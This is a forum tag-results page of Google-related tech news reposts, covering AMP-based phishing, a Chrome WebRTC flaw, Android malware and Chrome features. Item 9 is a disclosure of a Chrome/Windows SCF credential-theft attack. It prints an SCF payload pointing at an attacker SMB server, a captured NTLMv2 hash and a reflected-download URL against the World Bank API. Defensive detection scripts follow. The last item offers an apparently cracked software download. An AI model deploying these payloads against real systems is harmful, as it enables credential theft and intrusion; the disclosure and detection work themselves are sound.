Showing results for tags 'google'.



Found 974 results

  1. Quick Tip: Today I'm gonna show you how you can download your favorite Android apps directly from Google Play Store. From the Play Store, search for your favorite app, copy the link with the app id, then visit apps.evozi.com/apk-downloader/. Paste the link and click generate download link. Wait for some seconds as your download link is being generated. After a few seconds, your link should be ready for download. eNJOy!!! source: thetechblog
  2. Security researchers have exposed a sophisticated hacking and disinformation campaign that targeted more than 200 Gmail users. Russian government hackers seem to have figured out that sometimes the best way to hack into people's Gmail accounts is to abuse Google's own services. On Thursday, researchers exposed a massive Russian espionage and disinformation campaign using emails designed to trick users into giving up their passwords, a technique that's known as phishing. The hackers targeted more than 200 victims, including, among others, journalists and activists critical of the Russian government, as well as people affiliated with the Ukrainian military, and high-ranking officials in energy companies around the world, according to a new report. Researchers at the Citizen Lab, a digital rights research group at the University of Toronto's Munk School of Global Affairs, were able to identify all these victims following clues left in two phishing emails sent to David Satter, an American journalist and academic who's written about Soviet and modern Russia, and who was banned from the country in 2014. On October 7, Satter received a phishing email designed to look like it was coming from Google, claiming someone had stolen his password and that he should change it right away. As seen with other phishing attacks targeting people affiliated with the Hillary Clinton campaign that led to the DNC leaks of last year, the email, however, didn't come from Google. It was actually from a group of hackers known as Fancy Bear, or APT28, whom many believe work for Russia's military intelligence, the GRU. [Image: a screenshot of the phishing email received] The "Change Password" button linked to a short URL from the Tiny.cc link shortener service, a Bitly competitor. But the hackers cleverly disguised it as a legitimate link by using Google's Accelerated Mobile Pages, or AMP.
This is a service hosted by the internet giant that was originally designed to speed up web pages on mobile, especially for publishers. In practice, it works by creating a copy of a website's page on Google's servers, but it also acts as an open redirect. According to Citizen Lab researchers, the hackers used Google AMP to trick the targets into thinking the email really came from Google. "It's a percentage game, you may not get every person you phish but you'll get a percentage," John Scott-Railton, a senior researcher at Citizen Lab, told Motherboard. So if the victim had quickly hovered over the button to inspect the link, they would have seen a URL that starts with google.com/amp, which seems safe, and it's followed by a Tiny.cc URL, which the user might not have noticed. (For example: https://www.google[.]com/amp/tiny.cc/63q6iy) Using Google's own redirect service was also perhaps a way to get the phishing email past Gmail's automated filters against spam and malicious messages. According to Citizen Lab, who doesn't directly point the finger at Fancy Bear, the email was actually sent by annaablony[@]mail.com. That address was used in 2015 by Fancy Bear to register a domain, according to security firm ThreatConnect. And another domain used in the October attacks exposed by Citizen Lab was also previously linked to Fancy Bear, according to SecureWorks, which tracked the phishing campaign against the DNC and the Clinton campaign. Curiously, the email targeting Satter came just a few days before Google warned some Russian journalists and activists that "government-backed attackers" were trying to hack them using malicious Tiny.cc links. [Image: a screenshot of a phishing email received] Now we know that in October of 2016, when the hackers targeted Satter and at least 200 other people, the trick of using Google AMP was working, and Google hadn't blocked it.
Google has previously dismissed concerns about open redirectors, arguing that "a small number of properly monitored redirectors offers fairly clear benefits and poses very little practical risk." On Thursday, a company spokesperson said that this is a known issue and last year some Google AMP URLs started showing a warning if the company's systems are uncertain whether the link is safe to visit, such as this. But for some security researchers, they are dangerous. "The AMP service's behavior as an open redirect for desktop browsers was clearly abused in this situation and is also just trivial to abuse in general," Nicholas Weaver, a senior researcher at the International Computer Science Institute at UC Berkeley, told Motherboard in an email. "There is undoubtedly some engineering tradeoff I'm not seeing that causes them to maintain it." Google's redirectors might not be the only part of Google's infrastructure that Fancy Bear hackers have been taking advantage of. Citizen Lab researchers found a Tiny.cc URL that targeted an email address—myprimaryreger[@]gmail.com—that other security researchers suspect was used by Fancy Bear to test their own attacks. A screenshot of the Google Plus page of "myprimaryreger[@]gmail.com," an account researchers believe was controlled That address had a Google Plus page filled with images that appear in real, legitimate Gmail security alerts. It's unclear what the hackers used these for, or if they used them at all. But the researchers said that perhaps the hackers were embedding them in phishing emails, and the fact that they were hosted on Google Plus perhaps helped thwart Gmail's security controls. The Fancy Bear hackers are known to use popular services like URL shorteners in their high-profile hacking operations. And, sometimes, those URL shorteners betray them and end up revealing who they targeted. 
Between March 2015 and May 2016, as part of their operation to hack Clinton's campaign chairman John Podesta, and former National Security Advisor Colin Powell, the hackers targeted more than 6,000 people with more than 19,000 phishing links. Some of those used Bitly URLs that, as it turned out, could be decoded to figure out who they were intended to. An analysis of the Bitly link used to phish John Podesta Similarly, in this case Citizen Lab researchers were able to identify the victims by figuring out that there was a pattern behind how Tiny.cc creates short URLs. That pattern, as research fellow Adam Hulcoop explained to me, "was chronological." So, starting from the links sent to Satter, the researchers were able to guess other links created around the same time. It's impossible to know why the hackers keep relying on services like Bitly or Tiny.cc, which end up exposing some of their operations—although months later. One explanation could be that their phishing campaigns are highly automated, given that they target thousands of people. So, as Hulcoop put it, they need a modular phishing infrastructure where every element can be modified if needed, as "an insurance policy of sorts" and they use third party services "to try and balance the need for OpSec [operational security, or the practice of keeping operations secret] with the ability to operate at scale." "The construction of the Tiny.cc shortcodes pointing to TinyURL shortcodes, which ultimately point to phishing sites on different servers. This modularity is likely by design so that the operator can change up the individual components, servers, redirectors, etc., and only abandon the pieces that are burned," he said in an online chat. "The more layers you have, the more flexible you can be." Article source
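A mail-filtering check for the link shape described in the article above, as an added example that is not part of the original post or of Citizen Lab's report: it unwraps a google.com/amp/ link to its real destination and flags the ones that lead to a URL shortener. The shortener list, the function names and the sample message are assumptions made for the illustration; the only link taken from the page is the defanged Tiny.cc example.

```python
import re
from urllib.parse import urlsplit

GOOGLE_HOSTS = {"google.com", "www.google.com"}
# Assumed watch list: the three shorteners the article names.
SHORTENER_HOSTS = {"tiny.cc", "bit.ly", "tinyurl.com"}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)

# Constructed sample message; only the first link comes from the article.
SAMPLE_MESSAGE = """Someone has your password.
<a href="https://www.google[.]com/amp/tiny.cc/63q6iy">CHANGE PASSWORD</a>
Read more: https://www.google.com/amp/s/news.example.org/2017/story.html
Account help: https://accounts.google.com/signin
"""


def refang(url):
    """Undo the '[.]' defanging used in reports so the URL can be parsed."""
    return url.replace("[.]", ".")


def amp_destination(url):
    """Return the URL embedded in a google.com/amp/ link, or None."""
    try:
        parts = urlsplit(refang(url.strip()))
        host = (parts.hostname or "").lower()
    except ValueError:  # malformed host, e.g. stray brackets
        return None
    if host not in GOOGLE_HOSTS or not parts.path.lower().startswith("/amp/"):
        return None
    rest = parts.path[len("/amp/"):]
    scheme = "http"
    if rest.lower().startswith("s/"):  # /amp/s/<host>/... is the HTTPS form
        scheme, rest = "https", rest[2:]
    if "." not in rest.split("/", 1)[0]:  # first segment must look like a host
        return None
    dest = f"{scheme}://{rest}"
    return dest + ("?" + parts.query if parts.query else "")


def classify_link(url):
    """Return (verdict, destination) for a single link."""
    dest = amp_destination(url)
    if dest is None:
        return "not-amp-redirect", None
    host = (urlsplit(dest).hostname or "").lower()
    if host.startswith("www."):
        host = host[4:]
    verdict = "amp-to-shortener" if host in SHORTENER_HOSTS else "amp-redirect"
    return verdict, dest


def flag_links(message_text):
    """Return (link, destination) pairs for AMP links that hide a shortener."""
    hits = []
    for raw in URL_RE.findall(message_text):
        link = raw.rstrip(").,;")
        verdict, dest = classify_link(link)
        if verdict == "amp-to-shortener":
            hits.append((link, dest))
    return hits


if __name__ == "__main__":
    for link, dest in flag_links(SAMPLE_MESSAGE):
        print(f"FLAG {link} -> {dest}")
```
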
  3. Google has a new feature Google is rolling out a cool new feature that allows you to perform searches through your personal data - from Gmail or Photos - straight from the search engine interface. First spotted by Search Engine Roundtable, this new "Personal" tab shows you content from private sources, including emails and photos you've taken and uploaded to the cloud. There's nothing particularly difficult to figure out about this new tab because it works just like any other tab on Google. You first have to type whatever it is you want to look for like "flowers," and switch to the "Personal" tab, which you can find in the "More" tab at the end of the line. There, you'll find any emails you have received featuring this word, as well as any pictures stored in your Photos account containing flowers. As mentioned, this is a tab that you'll have to look for specifically if you want to look through it, as it's not included among the main ones. Incoming to you The feature seems to be rolling out slowly to users all over the world and looks like a great and interesting addition. After all, who doesn't like to be able to search through their personal data so easily and from a single interface? The feature works on both the web and the mobile versions of Google, so you can enjoy it wherever you are and whenever it happens for you to need to find something in your personal data without opening up loads of extra apps or, depending on what device you're using, tabs. To alleviate any worries people may have, the company added a notice on this new feature which states that "only you can see these results." This, of course, should make anyone concerned with seeing their private photos in a Google box relax some. Source
  4. Chrome: Sites May Record Audio/Video Without Indication Websites may abuse WebRTC in Google Chrome to record audio or video using the technology without any indication of that to the user. A security vulnerability was reported to Google on April 10, 2017 which allows an attacker to record audio or video using Chrome without indication. Most modern web browsers support WebRTC (Web Real-Time Communications). One of the benefits of WebRTC is that it supports real-time communication without the use of plugins. This includes options to create audio and video chat services, p2p data sharing, screen sharing, and more using the technology. There is also a downside to WebRTC, as it may leak local IP addresses in browsers that support WebRTC. You can protect the IP address from being revealed in Firefox, Chrome and Vivaldi, for instance. The reported vulnerability affects Chrome but it may affect other web browsers as well. For it to work, you'd have to visit a site and allow it to use WebRTC. The site that wants to record audio or video would then spawn a JavaScript window without header, a pop under or pop up window for instance. It can then record audio or video, without giving indications in Chrome that this is happening. Chrome displays recording indicators usually in the tab that uses the functionality, but since the JavaScript window is headerless, nothing is shown to the user. A proof of concept was created which you find linked on the Chromium Bugs website. All you need to do is click on two buttons, and allow the site to use WebRTC in the web browser. The proof of concept demo records audio for 20 seconds, and gives you an option afterwards to download the recording to the local system. A Chromium team member confirmed the existence of the issue, but did not want to call it a vulnerability. The explanation does not make a whole lot of sense to me.
Because Android does not show an indicator in the first place, and Chrome on the desktop only if enough interface space is available, it is not a security vulnerability? At the very least, it is a privacy issue and something that users need to be aware of. While users do have to trust sites enough to give them permissions to use WebRTC, it and the fact that the site needs to launch a popup window are the only things needed to exploit this. Google may improve the situation in the future, but users are on their own right now when it comes to that. The best form of protection is to disable WebRTC which can be done easily if you don't require it, the second best to allow only trusted sites to use WebRTC. If you allow a site to use WebRTC, you may want to look out for any other windows that it may spawn afterwards on top of that. Now You: Do you use services or apps that use WebRTC? Source
  5. Google has removed 41 Android apps from the official Play Store. The apps were infected with a new type of malware named Judy, and experts estimate the malware infected between 8.5 and 36.5 million users. According to researchers from Check Point, the apps were available on the Play Store for years, but have been clean and virus-free for most of the time. It appears that starting with April 2016, the apps were slowly updated with malicious code. The purpose of this code was to launch a browser app, load an URL, and use JavaScript to locate and click on specific banners that would bring profits to the malware's creators. One company behind most malicious apps According to Check Point, almost all malicious apps were made by a South Korean company called Kiniwini, but registered on the Google Play Store as ENISTUDIO corp. It is unclear if the company added the malicious code itself, or its servers were compromised and the code added by a third-party. Furthermore, besides the hidden ad-clicking activity, the operators of the Judy malware used it to insert intrusive ads in other apps, almost to the point that users had no possibility of viewing or interacting with the original app's content. A list of apps infected with the Judy Android malware is available here. Despite apps going through periodic reviews, Google's Play Store security system, named Bouncer, wasn't able to pick up the malware's malicious activity. Nonetheless, help is coming! Google launches new Android security services On May 17, during the Google I/O annual event, Google announced a new service called Google Play Protect. According to Google, this new service continuously scans all Android apps and user devices for malicious behavior and uses machine learning to detect any suspicious activity. Once it detects a malicious app, it removes it from the phones of all users who installed it. 
The new Google Play Protect service suite is currently shipping to all devices with the Google Play app installed. Source
  6. Chrome Home is an experimental feature of Chrome for Android that makes major changes to the mobile browser when enabled. Chrome has the reputation of being a very stable browser, one that is kept more or less like it is in regards to the user interface and functionality. While that is certainly the case, Google has worked on modifications to the user interface of the browser all the time in the past. Most of these experiments are not disclosed to users of the browser, while some are launched as experiments to get feedback on them before the decision is made to roll them out to all users, or throw them in the garbage bin. Chrome Home Chrome Home is such a new feature. Unlike other interface modifications or changes in the past, it is a major one. It changes the browser's New Tab Page, but also the main toolbar of Chrome, as it moves it from the top to the bottom of the browser screen. Note that the new feature is only available in beta releases of Chrome right now (Chrome Beta, Chrome Canary, Chrome Dev). First, let's take a look at how you can enable the new Chrome Home feature: Open Google Chrome Dev on your Android device (may also work with Canary and Beta already). Type chrome://flags in the browser's address bar and tap on the submit button to load the address. Locate Chrome Home on the page. The easiest way to do that is to tap on menu, select Find on Page, and enter Chrome Home to jump to the flag right away. Tap on the default menu underneath the Chrome Home flag, and set it to enabled once the selection menu comes up. You are asked to restart Google Chrome at this point to apply the change. Note that there are two additional flags right now that you can enable: Chrome Home Expand Button -- which adds a button to Chrome Home that lets you expand the interface when you tap on it (you need to swipe otherwise). Chrome Home NTP Redesign -- enables the NTP (New Tab Page) redesign for Chrome Home.
Chrome Home moves the browser's address bar to the bottom of the screen. This is a major move, considering that most browsers display the address bar at the top. Even if you don't mind the change, it is likely that you will need to grow accustomed to the new position, and that it will feel out of place in the beginning. The move of the address bar is the most visible, but not the only change that Chrome Home introduces. You can swipe up using the toolbar as your base for the motion to display the new tab page interface on the screen. This interface lists top sites (you visited) or popular sites, news, and links to Home, Downloads, Bookmarks and the browsing history. Tip: You can disable the popular sites by setting the flag "show popular sites on the New Tab Page" on chrome://flags to disabled. You can use the swipe motion to increase or decrease the size of the interface. Downloads, bookmarks and history display those directly; useful to manage downloads, open bookmarks, or manage the browsing history of Chrome for Android. (via Stadt Bremerhaven) Article source
  7. Tavis Ormandy, the most famous of Google's security experts, has ported Windows Defender DLLs to Linux with the aid of a new tool he released today on GitHub. The new tool is named loadlibrary, and Ormandy says he created it for the sole purpose of helping security researchers, not necessarily the Linux user community. Loadlibrary is for pen-testers and security researchers Loadlibrary's sole purpose is to allow researchers to run and load Windows DLLs on Linux together with specialized pen-testing tools called fuzz tools, or fuzzers. These tools perform an automated operation called fuzzing, which relies on feeding a software application with random data and analyzing the output for abnormalities. Google's security experts are big fans of fuzzing when searching for undocumented vulnerabilities. In the past years, Google has developed two of the most popular fuzzing tools around, namely OSS-Fuzz and syzkaller. Syzkaller is how Google engineers discovered three major bugs in the Linux kernel [1, 2, 3]. Two of these bugs had survived in the kernel code for 9 and 11 years, respectively, showing a fuzzing tool's ability to uncover bugs that humans couldn't spot during manual code reviews. Ormandy used tool to find "crazy bad" Windows flaw Earlier this month, Ormandy also used fuzzing to find a vulnerability in the Microsoft Malware Protection Engine, which he later described as "crazy bad" and "the worst Windows remote code exec in recent memory." The loadlibrary project is one of the tools Ormandy used for discovering that flaw. The default loadlibrary package Ormandy released today on GitHub includes a demo in which the researcher ported Windows Defender on Linux. More precisely, Ormandy ported the Microsoft Malware Protection Engine (MsMpEng), the security service installed by default on Windows 8, 8.1, 10, Windows Server 2016 operating systems. Of the MsMpEng package, Ormandy ported the Mpengine component, responsible for scanning and analyzing malware. 
Loadlibrary is not a Wine replacement Despite his demo, the researcher says loud and clear that his tool is not intended as a way to run Windows apps on Linux. "This project does not replace Wine or Winelib," Ormandy says, "Winelib is used to port Windows C++ projects to Linux, and Wine is intended to run full Windows applications. This project is intended to allow native Linux code to load simple Windows DLLs." Nonetheless, while Linux desktop users can't use loadlibrary in any way, the tool is attractive to app developers, who can use it to load DLL data into Linux apps without having to port the entire Windows app along the way. Article source
  8. Google Fuchsia UI Google’s I/O 2017 event offered the tech giant the perfect opportunity to announce projects that the company has been working on and the direction it intends to take in terms of AI and VR technology, among others. Earlier this month, images revealing a project that Google has been working on surfaced online. Details about Google Fuchsia first surfaced last year, but the recent report showed the OS’s System UI and revealed some features that it could incorporate. Android Police reported that during the Android Fireside Chat, Google’s VP of engineering for Android, Dave Burke was asked about one of the most exciting projects at Google, Fuchsia OS. The engineer said that the experimental project is at an early-stage and it’s one of the many projects that Google is working on. Fuchsia won’t replace Android or Chrome OS What sets Fuchsia apart is its open source nature, which allows developers to see the code and bring contributions to it. David Burke stated “How do you spell Fuchsia? Fuchsia is a early-stage experimental project. We, you know, we actually have lots of cool early projects at Google. I think what’s interesting here is it’s open source, so people can see it and comment on it. Like lots of early stage projects it’s gonna probably pivot and morph. There’s some really smart people on it, people we’ve worked with who are great. And so it’s kind of exciting to see what happens. But it’s definitely a different sort of independent project to android. And yeah, that’s basically it.” It’s worth noting that Google’s Fuchsia project isn’t being developed alongside Android, which means that Google doesn’t have any intention to replace Android OS or Chrome OS with this new project. Still, that doesn’t mean that the situation won’t change in the future, as Fuchsia OS gradually takes shape and becomes a stable operating system. 
Since it’s at the early stages of development, there’s still the possibility that it could be scrapped to make way for other projects by Google. At this point, time will tell if Fuchsia OS will eventually progress to become a full-fledged OS. Source
  9. Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the Internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it. The problem With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that? Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is how Show Desktop SCF file contents looked like: [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. 
Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet but does not give the same treatment to SCF files. SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example: [Shell] IconFile=\\170.170.170.170\icon Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon “. The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following: [*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06f cdd201ccf26d91cd9e326e00000000020000000000000000000000 The above example shows a disclosure of victim’s username, domain and NTLMv2 password hash. It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. 
Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files. Impact Password disclosure For users in Active Directory domains (corporate, government and other networks), password disclosure can have various impacts ranging from escalating internal network breaches to accessing externally available NTLM-enabled services and breaches based on password reuse. For Windows 8/10 users that are using a Microsoft Account (MSA) instead of a local account, the password disclosure impacts all the Microsoft services that are integrated with the MSA SSO such as OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and others. The common problem of password reuse can lead to more account breaches unrelated to MSA. Regarding password cracking feasibility, this improved greatly in the past few years with GPU-based cracking. NetNTLMv2 hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s. That’s 1.6 billion hashes per second. For an 8-character password, GPU rigs of 4 such cards can go through an entire keyspace of upper/lower alphanumeric + most commonly used special characters (!@#$%&) in less than a day. With hundreds of millions leaked passwords resulted from several breaches in the past years (LinkedIn, Myspace), wordlist rule-based cracking can produce surprising results against complex passwords with more entropy. The situation is even worse for Windows XP systems and networks where backwards compatibility with NTLMv1 has been explicitly enabled. In those cases, a downgrade attack can be performed forcing the client to authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2. This enables the attacker to capture a hash which can be cracked many times faster than NTLMv2 – in the case of LM often within seconds using precomputed tables for reversing cryptographic hash functions (“Rainbow tables”). 
SMB relay attacks

Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as the authentication method may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password. This was successfully demonstrated by Jonathan Brossard at the Black Hat security conference. Under certain conditions (external exposure) an attacker may even be able to relay credentials to a domain controller on the victim’s network and essentially gain internal access to the network.

Antivirus Handling of SCF

Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous. All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of the IconFile parameter, considering there are no legitimate uses of SCF with remote icon locations.

Introducing new attack vectors

Although using social engineering to entice the victim to visit the attacker’s website as well as open redirection and cross site scripting vulnerabilities on trusted websites are the most common attack vectors to deliver malicious files, for this attack I would like to add an often disregarded and lesser known vulnerability that could serve the same purpose, hoping it would bring attention to its impact.

Reflected file download

First described by Oren Hafif, the Reflected File Download vulnerability occurs when a specially crafted user input is reflected in the website response and downloaded by the user’s browser when certain conditions are met. It was initially used as an attack vector to trick the user into running malicious code (usually from a Windows batch file), based on the user’s trust in the vulnerable domain. Since the SCF format is rather simple and our attack requires only two lines that can be preceded and followed by (almost) anything, it creates perfect conditions to be used with RFD.

RFD is usually aimed at RESTful API endpoints as they often use permissive URL mapping, which allows for setting the extension of the file in the URL path. Chrome will not download most typical API response content types directly, so these would have to be forced through a download attribute in <a href=…> link tags. However, there are exceptions. Chrome uses MIME-sniffing with the text/plain content type, and if the response contains a non-printable character it will be downloaded as a file directly and automatically unless the “nosniff” directive is set. This can be demonstrated on the World Bank API, using the following URL:

http://api.worldbank.org/v2/country/indicator/iwantyourhash.scf?prefix= %0A[Shell]%0AIconFile=\\170.170.170.170\test%0Alol=%0B&format=jsonp

Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes.

Recommendations

In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files.

As SCF files still pose a threat, the measures that need to be taken depend on the affected users’ network environment and range from simple host level hardening and configuring perimeter firewall rules to applying additional security measures such as SMB packet signing and Extended Protection. With the first two the goal is to prevent SMB traffic from leaving the corporate environment by blocking ports that can be used to initiate a connection with a potentially malicious Internet-based SMB server. When possible, SMB traffic should always be restricted to private networks.

Conclusion

Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse the victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources. We hope that the Google Chrome browser will be updated to address this flaw in the near future.

Article source
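The IconFile inspection that the article says would be easy to implement, sketched as an added example (not code from the article or from any antivirus product): it walks a folder for .scf files and reports any whose [Shell] section sets IconFile to a UNC path. The sample file contents, the 64 KiB read cap and the function names are assumptions made for the example; 192.0.2.10 is a documentation address.

```python
"""Flag SCF files whose [Shell] IconFile entry points at a remote (UNC) location."""
import re
import sys
from pathlib import Path

MAX_BYTES = 64 * 1024  # SCF files are tiny; the cap is a choice made for this example

SECTION = re.compile(rb"^\s*\[([^\]]+)\]")
ICONFILE = re.compile(rb"^\s*IconFile\s*=\s*(.*?)\s*$", re.IGNORECASE)
# UNC path written with backslashes or forward slashes; group 1 is the host.
UNC = re.compile(rb"^[\\/]{2}([^\\/\s]+)")

# Constructed samples (not captured traffic).
SAMPLE_LOCAL_ICON = (
    b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
    b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)
# The two SCF lines surrounded by reflected JSONP text and a non-printable byte.
SAMPLE_REFLECTED = (
    b'/**/ typeof cb === "function" && cb\n[Shell]\n'
    b"IconFile=\\\\192.0.2.10\\share\nlol=\x0b({\"message\": []});"
)
SAMPLE_FORWARD_SLASHES = b'[shell]\nIconFile = "//files.example.test/icons/a.ico"\n'


def remote_icon_targets(data: bytes) -> list[str]:
    """Return the hosts named by UNC IconFile= values inside a [Shell] section.

    The file is read line by line instead of with a strict INI parser, because
    the two relevant lines may be preceded and followed by arbitrary content.
    """
    hosts = []
    section = b""
    for line in re.split(rb"[\r\n]+", data):
        header = SECTION.match(line)
        if header:
            section = header.group(1).strip().lower()
            continue
        entry = ICONFILE.match(line)
        if entry and section == b"shell":
            value = entry.group(1).strip(b'"')
            unc = UNC.match(value)
            if unc:
                hosts.append(unc.group(1).decode("latin-1"))
    return hosts


def scan_directory(root) -> dict[str, list[str]]:
    """Map each .scf file under root with a remote IconFile to the hosts it names."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not (path.is_file() and path.suffix.lower() == ".scf"):
            continue
        try:
            with path.open("rb") as handle:
                hosts = remote_icon_targets(handle.read(MAX_BYTES))
        except OSError:
            continue  # unreadable file: skip it, keep scanning
        if hosts:
            findings[str(path)] = hosts
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python scf_scan.py <directory>, e.g. a user's download folder
        for found_path, found_hosts in scan_directory(sys.argv[1]).items():
            print(f"{found_path}: remote IconFile host(s): {', '.join(found_hosts)}")
    else:
        samples = {
            "local icon": SAMPLE_LOCAL_ICON,
            "reflected content": SAMPLE_REFLECTED,
            "forward slashes": SAMPLE_FORWARD_SLASHES,
        }
        for label, blob in samples.items():
            print(f"{label}: {remote_icon_targets(blob)}")
```

The check reads files as raw bytes only; an SCF file saved in another encoding such as UTF-16 would need decoding first, which this example does not attempt.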
  10. Google takes steps to increase security Following the famous Gmail phishing attack from just a few days ago, Google has decided to make it more difficult for apps to get access to people's data. The company announced that new applications that request access to user data will, from now on, face more scrutiny. Some of these apps may even "qualify" for a manual review due to Google's enhanced risk assessment. “Until the review is complete, users will not be able to approve the data permissions, and we will display an error message instead of the permissions consent page. You can request a review during the testing phase in order to open the app to the public. We will try to process those reviews in 3-7 business days. In the future, we will enable review requests during the registration phase as well,” Google informs developers. Developers will continue to use their apps for testing purposes even before they get approved. They'll need to log in with an account registered as owner or editor of the project in the Google API Console. From there, they'll be able to add more testers and to start the review process. To add an extra layer of security, Google has updated the app identity guidelines. In them, it states that apps must not mislead users, which also indicates that they need to have unique names and not copy other apps, which is something that has happened countless times already. “These changes may add some friction and require more time before you are able to publish your web application, so we recommend that you plan your work accordingly,” Google says. Multiple changes to increase security The changes come as a result of the attack that took place a few weeks ago. Gmail users started receiving phishing emails pretending to be from someone they know who was looking to share content with them on Google Docs. A link took people to a login page where a fake Google Docs app requested permission to people's contacts and emails. 
The attack was stopped within an hour and the company said that less than 0.1% of Gmail users were even impacted by the incident. The company has already tightened OAuth rules, its anti-spam systems, and more. Source
  11. Google was hit by a phishing attack last week, as attackers used Google’s web app platform to publish an app seemingly named as ‘Google Docs’, tricking users into thinking that it’s the legitimate Google service. It took a mere three hours for Google to blacklist the offending web app; the next day, Google rolled out an update for Gmail to better warn users about phishing links. Today, the Mountain View giant has announced an update to its approach with regards to the publishing process for web apps that request user data. The company notes that while its API’s user data policy states that “apps must not mislead users” and that their names “should be unique to [the] application and should not copy others”, the process of enforcing this policy has been lackluster. To fix that, Google is updating its web app publishing process, its risk assessment systems, as well as the user-facing consent page for apps. As far as the average user is concerned – nothing changes. But, developers might notice delays in publishing or modifying their web apps. As an example, subject to how the new risk assessment process feels about a web app, some web apps might require a manual review by Google before publishing publicly. Developers will have to manually request said review during an app’s testing phase, and Google may take up to 7 days to give its nod; until approved, the app will only work for the owner, editor, and additional testers. The average user will not be able to provide permission to use their data until an app has been approved. These changes are sure to help prevent a repeat of such phishing attacks. Google didn’t state if any more changes were coming to the user-facing consent page, but hopefully, a change to highlight the app publisher’s name more prominently is in the works. Source
  12. Gmail Notifier Pro - the program to alert you when new mail in service Gmail. However, Gmail Notifier is more than just a tool for warning, it can be used to check the mail, as well as create new messages from the desktop interface, the choice of the type of account (Google Gmail Atom, Google Gmail IMAP, Google Calendar, subscribe to a feed and Google Reader ) and much more. You can also keep track of multiple accounts from Gmail. After installing the software, open the Options and set the account Gmail. You can use the method of both Atom and IMAP. After setting, you can see all the messages in the main window and a separate window allows you to view the contents of your email. Every time when a new e-mail message, you will receive a notification with the desktop will look pretty cool. The program supports themes that can be customized from the window Options. Set up a notifier so you more like it. When you need to create a new message, just click on the Compose New Email option in the system tray. Features: Gmail Notifier Pro provides many easy-to-use and settings. Checking multiple Gmail accounts for new mail - including Google Apps accounts. Displays pop-up notifications and plays audio message alerting the user when new mail arrives. A complete overview of all unread messages in all your inboxes. Support Atom and IMAP protocols. Allows you to create and respond to email without opening a browser. Integration with Google Contacts. Website: http://www.gmailnotifier.se Release date: 14 May 2017 OS: Windows XP / Vista / 7 / 8 /10 Language: ML Changelog: Download setup Download portable Installer + Fix: Site: https://cloud.mail.ru Sharecode: /public/5Gu2/bP9EQYCMh Installer + Fix + Portable: Note: Just copy the link and sharecode together and then press enter. You need to enter the credentials as mentioned in main post. The d/w starts immediately. 
